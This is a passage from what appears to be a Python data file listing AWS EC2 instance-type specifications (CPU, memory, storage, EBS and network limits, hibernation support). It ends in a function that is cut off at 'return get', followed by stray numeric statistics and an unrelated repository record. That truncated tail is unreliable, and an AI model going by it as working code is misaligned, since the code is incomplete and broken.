'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4000, 'BaselineThroughputInMBps': 500.0, 'BaselineIops': 32000, 'MaximumBandwidthInMbps': 4000, 'MaximumThroughputInMBps': 500.0, 'MaximumIops': 32000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4000, 'BaselineThroughputInMBps': 500.0, 'BaselineIops': 32000, 'MaximumBandwidthInMbps': 4000, 'MaximumThroughputInMBps': 500.0, 'MaximumIops': 32000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NvmeSupport': 'required', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}] # noqa: E501
def get_instances_list() -> list:
'''Returns list EC2 instances with HibernationSupported = True .'''
# pylint: disable=all
return get
| 21,818.833333
| 261,626
| 0.742707
| 20,085
| 261,826
| 9.671695
| 0.013791
| 0.047237
| 0.028993
| 0.045754
| 0.998059
| 0.998008
| 0.997601
| 0.995907
| 0.995521
| 0.99461
| 0
| 0.050392
| 0.072682
| 261,826
| 11
| 261,627
| 23,802.363636
| 0.749687
| 0.000523
| 0
| 0
| 1
| 0
| 0.683631
| 0.294934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
48a18149d76754d299f9c952d925081693a417a1
| 24,053
|
py
|
Python
|
dataprofiler/tests/profilers/test_unstructured_text_profile.py
|
az85252/DataProfiler
|
1303abe04b48fa87c67d8d9b3a13f8cb88e79afb
|
[
"Apache-2.0"
] | null | null | null |
dataprofiler/tests/profilers/test_unstructured_text_profile.py
|
az85252/DataProfiler
|
1303abe04b48fa87c67d8d9b3a13f8cb88e79afb
|
[
"Apache-2.0"
] | null | null | null |
dataprofiler/tests/profilers/test_unstructured_text_profile.py
|
